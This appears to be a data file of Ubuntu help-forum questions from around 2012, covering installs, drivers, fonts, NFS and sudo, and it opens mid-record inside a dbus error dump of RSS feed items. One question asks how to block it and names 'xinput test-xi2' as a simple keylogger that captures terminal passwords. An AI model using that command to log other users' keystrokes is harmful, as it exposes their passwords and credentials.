//feedproxy.google.com/~r/d0od/~3/0ke8obcm4ig/ ' , u'title ' : u'rdio & pandora support added to nuvola player ' } , u'1d6277c4-77ad-11e1-99a0-001c259909fc ' : { u'date ' : u'2012-03-26 16:48:23 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/1jiznwzr2vw/ ' , u'title ' : u'ubuntu\u2019s utouch tech brings smooth scrolling to chromium ' } , u'1d62cf8a-77ad-11e1-99a0-001c259909fc ' : { u'date ' : u'2012-03-25 15:13:53 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/dcmdewg1j48/ ' , u'title ' : u'kde tablet \u2018vivaldi\u2019 gets gutted ' } , u'93c27be4-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-03-28 11:22:04 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/mfoq1lxzyoi/ ' , u'title ' : u'linux photo manager shotwell updates , adds straighten tool ' } , u'93c268fc-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-03-29 19:02:55 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/lp86lxgnazu/ ' , u'title ' : u'ubuntu 12.04 development update ' } , u'93c27270-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-03-28 16:34:17 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/xq6r0fyeqfe/ ' , u'title ' : u'new gnome 3.4 release offers features , fun & ui finesse ' } , u'93c265b4-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-04-01 11:21:57 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/fq0qqdrwwsi/ ' , u'title ' : u'important notice for all omg ! ubuntu ! readers ' } , u'93c27ee6-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-03-27 11:46:14 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/ucviwqd6ih8/ ' , u'title ' : u'elementary launch luna wallpaper experiment ' } , u'93c26c3a-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-03-29 19:00:33 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/vjyrjjeahbm/ ' , u'title ' : u'ubuntu 12.04 beta 2 released ' } , u'1d621f2c-77ad-11e1-99a0-001c259909fc ' : { u'date ' : u'2012-03-26 18:02:45 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/fyk1qxrrise/ ' , u'title ' : u'\u2018snuggle truck\u2019 added to latest humble bundle ' } , u'90f51042-7f1a-11e1-913c-001c259909fc ' : { u'date ' : u'2012-04-05 11:40:25 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/ffafm29rcz8/ ' , u'title ' : u'15 new wallpapers land in ubuntu 12.04 ' } , u'93c26208-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-04-01 14:48:14 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/npoh61ja3ww/ ' , u'title ' : u'the official ubuntu 12.04 cd cover ' } , u'93c2759a-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-03-28 15:21:00 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/i4bhvzszcpk/ ' , u'title ' : u'grab the lubuntu 12.04 countdown widget ' } } , u'limit ' : 20 , u'link ' : u'http : //www.omgubuntu.co.uk ' } , u'26865c26-77ad-11e1-90cb-001c259909fc ' : { u'refresh_rate ' : 15 , u'title ' : u '' pavol kla\u010dansk\xfd 's blog - opinions and development '' , u'url ' : u'feed.xml ' , u'items ' : { u'26864d94-77ad-11e1-90cb-001c259909fc ' : { u'date ' : u'2010-01-24 13:48:38 ' , u'read ' : false , u'link ' : u'http : //blog.klacansky.com/mind-scanner/logo-design-reevolution ' , u'title ' : u'logo & design ( re ) evolution ' } , u'26865028-77ad-11e1-90cb-001c259909fc ' : { u'date ' : u'2010-01-13 20:46:59 ' , u'read ' : false , u'link ' : u'http : //blog.klacansky.com/matter-code/wordpress-plugin-added-facebook-share-support ' , u'title ' : u'wordpress plugin : added facebook share support ' } , u'268652bc-77ad-11e1-90cb-001c259909fc ' : { u'date ' : u'2009-12-30 20:46:34 ' , u'read ' : false , u'link ' : u'http : //blog.klacansky.com/matter-code/wordpress-plugin-unique-image-for-article ' , u'title ' : u'wordpress plugin : unique image for article ' } , u'2685c004-77ad-11e1-90cb-001c259909fc ' : { u'date ' : u'2010-12-05 10:56:13 ' , u'read ' : false , u'link ' : u'http : //blog.klacansky.com/matter-code/intro-to-my-new-project-called-speedyrss ' , u'title ' : u'intro to my new project called speedyrss ' } , u'26860622-77ad-11e1-90cb-001c259909fc ' : { u'date ' : u'2010-11-04 14:22:25 ' , u'read ' : false , u'link ' : u'http : //blog.klacansky.com/my-hardware/how-fast-does-hamburger-get-spoiled-in-rain-forest ' , u'title ' : u'how fast does hamburger get spoiled in rain forest ? ' } , u'26858206-77ad-11e1-90cb-001c259909fc ' : { u'date ' : u'2010-12-28 19:48:47 ' , u'read ' : false , u'link ' : u'http : //blog.klacansky.com/my-hardware/do-you-really-love-hamburger-i-dont ' , u'title ' : u'do you really love hamburger ? i don\u2019t ' } , u'26864aba-77ad-11e1-90cb-001c259909fc ' : { u'date ' : u'2010-10-10 17:24:04 ' , u'read ' : false , u'link ' : u'http : //blog.klacansky.com/mind-scanner/farewell-to-facebook-chat-has-survived ' , u'title ' : u'farewell to facebook , chat has survived ' } , u'26853652-77ad-11e1-90cb-001c259909fc ' : { u'date ' : u'2011-08-09 13:26:53 ' , u'read ' : false , u'link ' : u'http : //blog.klacansky.com/matter-code/current-status-of-speedyrss ' , u'title ' : u'current status of speedyrss ' } , u'268642a4-77ad-11e1-90cb-001c259909fc ' : { u'date ' : u'2010-10-17 14:44:15 ' , u'read ' : false , u'link ' : u'http : //blog.klacansky.com/matter-code/ant-taskdef-class-com-android-ant-setuptask- can not -be-found ' , u'title ' : u'ant : taskdef class com.android.ant.setuptask can not be found ' } } , u'limit ' : 20 , u'link ' : u'http : //blog.klacansky.com ' } } , signature=dbus.signature ( 'sv ' ) ) , ) to message with signature a { sv } : < type 'exceptions.typeerror ' > : an integer is required
115614	cpu fan deactivated during 11.10 installation	i have tried to install ubuntu 11.10 . during the installation process the cpu fan was switched off . some minutes later the notebook switched itself off . how could i switch the fan manually on ? are there other options ?
115615	do all the apps that work in gnome shell also work in unity ?	do all the apps that work in gnome shell also work in unity ? or if there is a limitation is there some way to know that without actually trying the app ?
115617	copying subdirectories with -r option not working	i just want to copy the contents of a directory and the subdirectories within it over to another directory in a bash shell . i assumed cp -r would do this . however , this is n't working : cp -r $ basedir/upload/temp $ basedir/backup the directory temp has a bunch of files and directories in it . but after i run this command , i only get the files in backup . no directories are copied . i 'm also having the same problem with the -r option with a zip command . in the same bash shell , i 've got these commands : cd $ basedir/upload/temp zip -r $ basedir/backup2/backup2.zip . when i look at the contents of backup2.zip , all it has are the files , no subdirs . ( i cd into the directory because it 's the only way i know to store files in a zip without getting the absolute path stored as well , which i do n't need . ) what am i not getting about the -r option ?
115619	using usbdrive as ram in ubuntu	in windows it is possible to use usb flash drive as a virtual ram . i wonder if it is possible to do so in ubuntu ? if it is , how could one do it ? [ edit ] : i mean ready boost equivallent for ubuntu . i know that it is not a perfect replacement for ram and it is not advisable for longterm use . is creating swap file in a usb flash drive similar to it ? will it demonstrate performance gains over a swap file in a hard disk drive ?
115622	xubuntu 11.10 x 64 sandy bridge ( i5 2500k ) graphics glitches	i have xubuntu 11.10 x 64 and i5 2500k cpu ( sandy bridge ) . in some games , e.g . minecraft i see glitches . maybe the problem is in the default xubuntu drivers ? please advise . also some games like tuxkart ( designed for linux ) is hanging after a while .
115624	error : need a repository as argument	i am kind of new in linux , and i am using kubuntu and i keep getting this error when installing a package in terminal , i tried java , openshot , any ppa package and i keep getting `` error : nedd a repository as argument '' . i would appreciate if someone could help me . example : kristyano1987 @ kristyano1987-pc : ~ $ sudo add-apt-repository ppa : ferramroberto/javasudo apt-get updatesudo apt-get install sun-java6-jre sun-java6-plugin sun-java6-fonts error : need a repository as argument ''
115628	multi touch with web cam	i found the following article multi-touch in ubuntu using a webcam and your hands . can some one tell me how to use my laptop camera to control ubuntu 12.04. like it is done in the video ? to control presentations with hand movement & more functions .
115632	ubuntu not display in boot manager list	i install the latest version of ubuntu on a computer that previously had windows 7 and vista on it . ubuntu is install in a separate hdd . my problem is that when i boot the computer the windows boot manager appears with windows 7 and vista as an option to select , ubuntu is not on the list . thus i can not boot into ubuntu . any suggestion what to do next ?
115638	way to have accelerate mouse pointer ?	id like to know if there is anything to do to have accelerated motion of mouse pointer in 11.10 , i.e . a small jerk of mouse or touchpad would push the pointer to more-than-usual distance
115645	how to change default fonts in xubuntu	how can i change the default font settings in xubuntu ? all i can find is the overall font settings in the appearance menu , i want to be able to set things like my monospace font for the terminal ? edit on ubuntu , there is a settings menu , where you can edit fonts for individual purposes , for example , title font , window font , monospace font etc . im looking for a similar menu in xubuntu
115649	bcm4313 wireless not working on dell inspiron 4010	i have ubuntu 11.10 installed today and trying to connect to wireless but its not working . it has been working correctly on my windows 7. i am pretty new to ubuntu . i tried suggestions listed in this forum but nothing seems to be working for wireless . it shows wireless card listed when i do- sudo lshw -c network : it displays wireless interface as bcm4313 . my laptop- dell inspiron 4010 ubuntu- 11.10 any suggestions ? it works when i connect lan cable to same modem .
115650	how to open a dat files from a vcd ?	i am trying to open .dat files from a vcd but can not open them . help please ?
115653	decrease mouse scroll amount	how can i decrease ( or generally change ) the mouse wheel scroll amount in ubuntu ? i did n't mean the speed of scroll , and the thing i want is just the amount . for example , when reading a document , i want to scroll one line instead of three lines ( with scrolling a little ) .
115661	unlock all private keys on ubuntu , entering password only once at login	i login to ubuntu 12.04 using a password . later on , when i use my browser ( chrome ) , i 'm asked for a password to unlock the keychain so that the browser can access my saved credentials for various websites ( it 's the same password ) . also , whenever i use ssh to connect to other computers using my private key , i am prompted for the same password to unlock my private key . how can i make it so that i am asked for my password exactly once per login ( given that my login password is the same as the one i use for all my private keys ) ? one important requirement : all of my private keys should have a password . this means that i will have to type in one password on login , which will unlock some key which in turn decrypts the passwords for all other keys ( which are also unlocked ) . it also means that if someone else gets access to my private keys , they will not be able to use them without at least one password . probably someone will try to label this question as a duplicate of this question , this question , or this question . while these questions are similar , none of them explicitly say that there still needs to be a password entered on login , as i am demanding here . as a result , the accepted solutions just say `` set your passwords to blank '' -- i do n't want that , it 's dangerous ! so i am aware of the similar questions , but none of them has received the correct answer yet , because they are slightly different .
115665	`` unable to find a medium containing a live filesystem '' while trying to install	yes , i have read questions and answers with similar titles for this issue , which prevented me from installing ubuntu for several months now , trying to figure it out . i have a macbookpro with triple partition ( one for mac snow leopard , one for windows 7 , one for linux ) created with refit firmware ( not bootcamp ) . i set up the system according to these instructions for refit : http : //lifehacker.com/5531037/how-to-triple+boot-your-mac-with-windows-and-linux-no-boot-camp-required now . there is a free partition ready to accept linux into its arms , but linux does not want to participate . most answers to the issue `` unable to find a medium containing a live filesystem '' point to changing the bios booting system ( which i do n't know how to do , especially using this refit booting system ) , and to changing the socket of the usb ( which does not concern me , since i am using a cd , actually i tried with a cd , then with a dvd , since a blank cd is only 700mb while the iso image file of ubuntu is about 731mb ) . anyway . this is what happens : i am in the mac system ( using the mac partition ) i insert the dvd with the burned image of ubuntu ( yes i have tried burning it again and agin on both cd and dvd blank discs ) . i restart the computer . when refit loads , i hold down the alt key until the cd image appears . i select it , and hit enter . a small ubuntu icon appears at the bottom of the screen . then a ubuntu sign appears in the middle of the screen with small dots underneath , lighting up progressively over and over to indicate it 's loading . then everything turns black and the following message appears , at the end of a few lines of text : '' unable to find medium with live file system '' . please start by saying how do i access the bios setup from refit bootup , and exactly what and why i need to try and change . ( will this mess up my refit bootup ? ) and anything else i need to do to finally be able to install ubuntu .
115666	laptop screen not detected but ubuntu working on other monitor	i have a laptop with with intel celeron inside 64 bit , the 64 bit amd ubuntu 11.10 is working on the laptop , just it wont detect the laptop screen but the same live usb worked on amd 64 pc , when i connected the desktop computer monitor to the laptop it worked perfectly with 1920x1080 screen , battery , wifi . im not sure if its cause i made the usb it with lilo live usb creator on the desktop pc , should i remake the usb on the laptop ?
115668	how do i authenticate on a iprism content filter from a server ?	i will be moving ( with my home server ) to a more public network . the network i will be on has an iprism content filter . in order to access the internet one needs authenticate ( open up a web browser and enter a username an password ) first . i am using an ubuntu server and am unsure as to how i would do this .
115669	setting to protect gnome-terminal from key logging	looks like it is easy to log keystrokes of all processes of the same user . a basic keylogger is 'xinput ' . xinput test-xi2 the command generates log of all key-presses . unfortunately , this includes passwords in gnome-terminal . googling suggested that grabbing keyboard may prevent other windows from capturing key strokes . is there a way to prevent xi2 logging in gnome-terminal ? or is there an x terminal that has this feature ?
115672	why ca n't the unity panel be hidden ?	what intrinsic purpose does the static unity panel hold for the os ? there has to be a great reason for this thing to have to be here . it only goes away in fullscreen apps and i ca n't use everything fullscreen why can the unity panel not be hidden ?
115673	error when trying to activate fglrx graphic propietary control ati/amd	i 'm new to ubuntu . i still do n't understand a lot of features . as far as i know , i can install the ati drivers through the additional drivers when i press 'activate ' in the fglrx graphic propietary control ati/amd it comes up with an error . lo sentimos , la instalaci贸n de este controlador fall贸 . revise el archivo de registro para ver m谩s detalles : /var/log/jockey.log english translation : sorry , this driver installation failed . check the log file for more details : /var/log/jockey.log the problem is that i 'm trying to make compiz work . and since i have no video card drivers i cant modify any of the interface features ( like 3d cube and that stuff ) .
115675	xhost setting at boot	i am able to set xhost at boot in fedora by editing /etc/gdm/init/default and for example add : /usr/bin/xhost +local : how can similar be done in ubuntu ? i want that the /usr/bin/xhost +local : command is executed when the system is sitting at login prompt .
115679	how to create a windows-readable fat32 partition on persistent usb ?	is it possible to create a fat32 parition in ubuntu persistent usb that is windows-readable ? if so how ? i created a fat32 partition in the past and labelled it as '/windows ' , though this was unable to be read by windows 7 and only accessible through the root user on ubuntu - i eventually was able to read it through editing fstab , but just as before , on windows 7 it said 'the drive 'x ' must be formatted before it can be used . ' or something along those lines . i have since formatted and am now in the process of deciding partitions and sizes , but i believe i created the '/windows ' partition as primary , 2gb , and as fat32 . should it be logical , or within the '/home ' partition ? on a separate note , which subdirectories of '/ ' should i create as a separate partition , and how large - especially for '/home ' - is it necessary ?
115681	display a column showing the tags set by dolphin	in dolphin 2 you can add tags to files , but you ca n't add a column in the detailed view to display them . is there a way to select files based on their tags ?
115686	how can one-handed work in ubuntu be eased ?	my right hand is temporarily immobilized and i would like to do some minor general work on my computer . mostly web browsing , mailing and file and directory browsing and editing . for this i currently use firefox , thunderbird , nautilus and the gnome terminal ( i have already asked a specific question about emacs ) . are there ways to ease such , or any other general , one-handed work in ubuntu ? i have found http : //stackoverflow.com/questions/2391805/how-can-i-remain-productive-with-one-hand-completely-immobilized but that is not exactly what i am asking for . i want to ease whatever little time spent one-handed in ubuntu and this is also interesting for situations where there is no injury involved , such as when one hand is occupied . i do realize i should avoid unnecessary strain . the main thing that is much slower one-handed is writing . since i am only temporarily immobilized it seems to make no sense learn a new keyboard layout . i would be surprised if i managed to learn and become more effective with a new keyboard layout ( than one-handed qwerty ) before i can use my other hand again . what i have already found : sticky keys for making it easier to enter keyboard commands . when writing one-handed there are more cases of where it is useful to paste in phrases rather than to reenter them . it is easier to use super+s rather than ctrlalt+arrow keys to switch work space .
115689	why ca n't i boot from harddisk ?	i tried ubuntu 12.04 on a asus 1101ha installed on a usb stick , i clicked on the install to harddrive icon , after 30 minutes or so it said that the installation completed succesfully , so i rebooted my netbook en hoped it will work but it did n't .at first i see the purple screen for a few secconds and the i see a black screen no blinking cursor or anything . please help , i really like your os , eric nobel
115690	this kernel requires cmov not present on cpu error message	when i try to install ubuntu i get the message this kernel requires cmov not present on cpu what does this mean and how do i get around it ?
115693	ubuntu install hangs	when i try to install/run ubuntu from a livecd , it just hangs on this screen ... any ideas ? i 've unplugged all my usb devices other than my death adder mouse and g15 keyboard , tried 32bit and 64bit 11.10 but both do the same thing . ran the memory test on the ubuntu install cd and it was fine . thanks , pc specs.. asus p5q motherboard q6700 cpu 4gig dominator 1066mhz corsair 1tb hdd asus 560ti graphics card edit : after unplugging all my usb devices ( putting a new keyboard in ) and disabling firewire on my motherboard in the bios , i get the image below ...
115694	`` dependency is not satisfiable '' error when trying to install an application	when i try to install glchess in synaptic i get this error at a certain time i installed the gnome desktop and a lot of games that came with it and then uninstalled the games . now i want chess back . when i downloaded the deb file and tried to install it in gdebi i got a similar error : what should i change in repositories ?
115695	swap partition is not recognized	i think this problem might be related to this one : failing to recover from hibernate basically , as soon as ive installed ubuntu , using the automatic partitioning , if i run gparted and look at my disk partitions , my swap space is displayed as unknown , with an exclamation mark next to it : ok , next step , i manually assign the 'unknown ' section to be a swap partition , and attempt to hibernate . when i switch my system back on , it runs as described in the link above , failing to restore from hibernate . when i run gparted again after its restarted , the swap partition is back to 'unknown ' . any idea whats going on here ?
115700	why is ubuntu booting in 2d mode on vmware ?	i installed ubuntu 11.10 on vmware , and now when i boot ubuntu , it takes me directly to a 2d session . anything i 'm missing here that would prevent it from loading the 3d desktop ?
115701	gksudo and dbus	i 've created some disabled accounts for the sole purpose of customizing docky in those accounts . each account has a set of docky items that represents a tool set . this should give you an idea of what i mean by a docky tool set : admin app tool set online user app tool set offline user app tool set office app tool set gamer app tool set , etc . from these disabled accounts , i want the actual user to enable or disable tool sets through gksudo calls : xhost + local : dockyadminuser gksudo -u dockyadminuser /usr/bin/docky i 've already set up the accounts , but when i launch docky this way it complains that it needs dbus and ca n't find it . how can i make dbus available so docky can fire up this way ? note : this same thing happens for tomboy , it 's wo n't run and complains of a dbus problem . note : i 'm not looking for a solution that suggests i do n't launch docky as another user . there is more than one reason that i must launch docky as another user . but i kept those reasons out in order to keep the question clearer . *
115705	ca n't play dvd - vob files	works fine in windows 7 i just put in the dvd and it plays . i 've downloaded vlc for ubuntu 11.10 and tried playing both the individual vob files ( did n't work ) and the root directory on the dvd ( also did n't work ) . i 've read something about mounting the dvd as an iso ? could someone talk me through getting this to work ? for what it 's worth they 're legit dvds , not copies or anything , so i 'm surprised i ca n't get it to work . thanks in anticipation !
115709	using ctrl-alt-f1	i have a program , a metaverse viewer ( any of the graphic ones apply here ) and it uses ctrl+alt+f1 for a ui function . but i ca n't get that key combination to actually do anything . i 've disabled vt switching in xorg.conf , so now it does n't switch to a vt , but it seems ctrl+alt+f1 does n't generate anything , or it 's suppressed somewhere else . i 'm just not sure where else to look . any ideas ?
115710	enter password only once for script making many sudo calls	i am writing a script to download build and install a bunch of packages . building sometimes takes a while , and installing requires root priviledges : make ; sudo make install what happens alot is that when a build takes a while i need to keep entering my password . i want to be able to only enter it once . i could call the script with root access , but then ( as i understand it ) every call it makes will be with root priviledges . i do n't want this because then , eg. , many files and folders get created that ca n't be deleted without root access . so what is the best way to do this ?
115735	is it possible to install ubuntu on a craig clp281 netbook ?	the netbook was sold with android ( 2.2 ) on it . it only has 4 gb of built in storage . is that enough to install a minimal ubuntu install onto ? if so , how would i go about doing it ? here are the specs . thanks !
115736	“dependency is not satisfiable” error when trying to install ubuntudico	i try to install the ubuntudico dictionary . i found it here . downloaded the deb from the link provided there . i get an error ( similar to the one i posted in a separate question that maybe could be unified with this one ) . what is it to be done ? what should i add to the repository ? when trying to install gambas2-gb-qt-kde i get the following : i do n't seem to find kdelibs4c2a for my architecture . i have xubuntu 11.10 . universe is enabled . at this page i found that the requested environment is : ( k ) ( edu ) ubuntu 8.04 and above debian 5.0.4 and above ( does this means that the dictionary is accessible only from kubuntu/edubuntu ? ) and that the needed dependencies are : gambas2-runtime ( > = 1.9.48 ) gambas2-runtime ( < < 2.90 ) gambas2-gb-qt ( > = 1.9.48 ) gambas2-gb-qt ( < < 2.90 ) gambas2-gb-form ( > = 1.90.1 ) gambas2-gb-form ( < < 2.90.0 ) gambas2-gb-net ( > = 1.9.48 ) gambas2-gb-net ( < < 2.90 ) gambas2-gb-qt-kde ( > = 1.9.48 ) gambas2-gb-qt-kde ( < < 2.90 ) gambas2-gb-qt-kde-html ( > = 1.9.48 ) gambas2-gb-qt-kde-html ( < < 2.90 ) but gambas2-gb-qt-kde and gambas2-gb-qt-kde-html are not available in synaptic .
115738	why jamendo is off stores of music player banshee and rhythmbox and how can i add jamendo to the stores ?	jamendo is open music platform for artists and listers , i know that debian was on jamendo on the stores on rhythmbox by default , and also ubuntu use to have so why is not been there anymore on ubuntu ? is it because of ubuntu one ? and how can i add jamendo to the music players like rhythmbox and banshee ? magnatune store is on rhytmbox plugins bu t not on banshee ? can we expect jamendo to be include on next release , that i am using beta version , of ubuntu 12.04 ?
115740	'dd ' access to a drive	i 've been working with making custom bootloader and kernel code ( not necessarily linux kernel ) . i 'm putting the images on usb , and was using dd to place them on the sector they needed to be on , and i 'm getting tired of burning the image to /dev/sda instead of /dev/sdb ( effectively destroying my hard drive ) . so i was wondering if i could somehow give user access to the 'dd ' command , but only to the /dev/sdb drive , so that if i accidentally type /dev/sda it wo n't let me , because i would n't have run the command as sudo or root .
115741	how do i force folder view sort order to not ignore special characters ?	i have many folders in my home directory that have names that begin with special characters such as _old_500gb_hd or ! folderiwanttoseeatthetop , but for some reason these folders are sorted according to their first alphanumeric character rather than the leading special character . so how can i force the folder to not ignore the special character , or how else can i make the sort view organize certain folders at the top or bottom of the sort ? thanks .
115745	mouse not working properly	i just did a clean install of ubuntu 11.10 but for some reason the mouse is n't working properly . problems i 'm experiencing are : left button on the mouse does n't work , the cursor does n't highlight anything , as well , the right side will not do a double click function . does n't seem to bring up the mouse menu to `` go back '' as well , `` go forward '' options . in order to make things work , i have to use the enter key , and arrow keys .
115746	how to restore corrupted installation ?	i have a laptop with dead battery that when there is no current connected to it turns critical so fast and in the energy management in ubuntu , when the battery is critical , there are 2 options : shutdown and hibernate witch is in grey ( unclickable ) , so i have no choice but to chose immediate shutdown , there is no standby even if it is an option in the screen behavior . an immediate shutdown ( and i mean by immediate the one that we use when we ended using the computer ) happened while i was installing a program called quickly , so after the power was restored , i tried to reinstall the program then i get this translated message : an untreatable error occurred : it seems there is a software error in aptdaemon , the program that lets you install and remove software and any other task related to package management . details : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 968 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate a file for the libpng12-dev package . this might mean you need to manually fix this package .
115749	problem when trying to install libreoffice 3.5.1 due to lock file	i tried to install libreoffice 3.5 from ppa , but this problem appears : error : unopkg can not be started . the lock file indicates it as already running . if this does not apply , delete the lock file at : /var/lib/libreoffice/share/prereg/.lock dpkg : erreur de traitement de /var/cache/apt/archives/python-uno_1 % 3a3.5.1-1ubuntu1~oneiric1_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 treatment of deferred stock ( « triggers » ) for « libreoffice-common » ... errors were encountered while processing : /var/cache/apt/archives/python-uno_1 % 3a3.5.1-1ubuntu1~oneiric1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
115754	running a script with a command	how do i make a new command to run a script , for example if i type runme ( from any dir ) it will run /run/me/script.sh ? seems simple but i can find anywhere that explains how to do this : /
115757	can i install ubuntu on usb hdd without loosing data on it ?	i have live-usb stick that i can boot latest live ubuntu from . then i have 160gb external wd hdd with few gb free of space . my notebook ca n't have any internal hdd so i was wondering if i can use my external one to install and boot ubuntu and install new programs , save settings etc . without loosing ( or moving around ) any data on this external hdd . the best would be if i can somehow use the live-usb . i 'm traveling so any `` complicated '' solution might be bit hard to implement . i do have an access to the internet .
115761	do i have the right graphics driver ?	i just did a clean install of kubuntu 11.10 . how do i find out whether the best graphics driver is installed , and how can i install what 's needed ? the question is rather specific but is there a general command that says : `` yes , you have the right driver ? $ lspci ... 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) ...
115762	increase padding in gnome terminal	i 'd like to increase the padding in the gnome terminal , because the default has no padding and hurts my eyes . ( padding as in : i want space between the window border and where the text input/output is displayed . ) for example : = [ x ] [ - ] [ ] =============my terminal================== | | | $ > echo `` padding occurs on both sides for long | | input '' | | | | | | | ====================================================
115774	how to have a program open with compiz `` put right '' ?	when i open my text editor , i always use a keyboard shortcut to `` put right '' through the compiz window-snapping feature . is there a way i can make this single program always automatically open that way , and put itself there ?
115779	youtube videos are displayed oddly	i would show you all a picture of how the youtube window looks , but i do not have enough reputation . the video is displayed as a small player to the top right of the designated area . a very large portion of the designated area is just black because it appears the player has shrunken . the options of the video are also displayed oddly , as the `` larger player '' and `` full screen '' options are missing and the options layout is much different than i have experienced before converting my computer to ubuntu 11.10 . i believe that it is a flaw , and i was wondering if it could be fixed .
115782	error installing ubuntu 11.10	i 'm trying to install ubuntu 11.10 on my desktop , but it always stops at `` configuring the hardware '' and will never finish the installation . impr pant : http : //imageshack.us/photo/my-images/521/imprpant.png/ the last line is : -- auto -- force -- quiet
115783	nfs mount of /var/www to os x	i have spent 2 hours trying to create an nfs mount from my ubuntu 10.04 lts server to my os x desktop system . objective : three way file compare between the code base on the mac , the development system on the local linux test system , and the hosted website . the hosted service uses cpanel so i can mount a webdisk - easy as pie - took 10 seconds . the local ubuntu box , on the other hand - nothing but pain and frustration . here is what i have tried : in file browser , navigate to /var/www/site and right-click . select share this folder . enter sharename wwwsite and a comment . click button `` create share '' . message says - you can only share file systems you own . there is a message on how to fix this , but the killer is that this is sharing by smb . it will change the lfs to cr-lfs which will affect the file comparison . so forget this option . in a terminal window , run shares-admin ( i have not been able to convince it to give me the `` shared folders '' option in the system administration window - maybe it is somewhere else in the menu , but i can not find it ) define an nfs export . enter the path /var/www/site , select nfs enter the ip address of the imac and save . on the mac , try to mount the file system using the usual methods - finder , command line `` mount '' command - not found . nothing . tried restarting the linux box in case there is a daemon that needs restarting - nothing . so i have run out of stuff to do . i have tried searching the documentation - it is pretty basic . the man page documentation is as opaque as ever . please , oh please , will someone help me to get this thing to work ! thanks for reading this far ... pg .
115785	my internet connection slows or dies unexpectedly	i installed ubuntu 10.04 once again and i 'm having some problems which i had before , but i have no idea how i solved them . on windows , everything 's working fine and i had no problems with this . my problem is that sometimes , when browsing through the internet , webpages just start to load really slow , sometimes it does n't load anything at all ( error 118 ( net : :err_connection_timed_out ) : the operation timed out . ) and it starts to work after few minutes . my ipv4 settings are automatic ( dhcp ) , and ipv6 settings are ignored/disabled . i think my previous problems had something to do with ipv6 , but i 'm not sure . is there a fix for this ? iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : '' fsite1 '' mode : managed frequency:2.442 ghz access point : c8:3a:35:40:43:68 bit rate=0 kb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=43/70 signal level=-67 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0
115786	tooltips text and background are same color in gnome-shell	my tooltips are completely black boxes . i ca n't tell if they are displaying incorrectly , or if it is just that i can see the text very faintly , so it must be that the text and background are both near-black . i 'm using gnome-shell in ubuntu 11.10 , in which settings manager does n't have the option to change the colors in the tooltips , just background and theme settings . any idea what should i do ?
115791	why /lib/modules taking so much space on xubuntu ?	i have a 2g home partition , /lib/modules is taking more that 1.5g . i got 12 directory named after version of kernel 2.6.32 each taking 119k . why do i have all of that ? do i need all of that ? if not , what is the clean way to remove what i do n't need ? thanks
115793	quickly , syntax error : media_grid.show ( )	i run the app and get this error . the little arrow points to the 'd ' , dont know what that means . plus i had the same error just before but on this line : from quickly.widgets.dictionary grid import dictionarygrid the arrow pointed to the 'd ' in grid as well . then i changed it to this : from quickly.widgets.dictionary_grid import dictionarygrid i added a '_ ' in the middle . and now i have the syntax error in the question . thanks for any help that is given ! traceback ( most recent call last ) : file `` bin/simple-player '' , line 32 , in < module > import simple_player file `` /home/alex/simple-player/simple_player/__init__.py '' , line 14 , in < module > from simple_player import simpleplayerwindow file `` /home/alex/simple-player/simple_player/simpleplayerwindow.py '' , line 51 media_grid.show ( ) ^ syntaxerror : invalid syntax
115794	statistical network usage tools	i am looking for applications that can do an statistical network usage . i will be putting up a server with squid proxy and would like to know of a program that can show me what pages are visited more , what users use more bandwidth and any other stats that can be found while using the server for internet access .
115795	can microsoft office programs be opened by default instead of libre office ?	folks . i finally convinced my sister to drop windows at her small business and go ubuntu . she complained , though , that she does not want to use libre office and is willing to use microsoft office instead . i was like , ok , but then ... then , she asked : - libre office is the default , right ? - right . - so , if someone gives me a document , by default it will open on libre office . can you make it open on microsoft office by default instead ? so , even if i get it working via wine , can i do what she requested or is it an impossible task ?
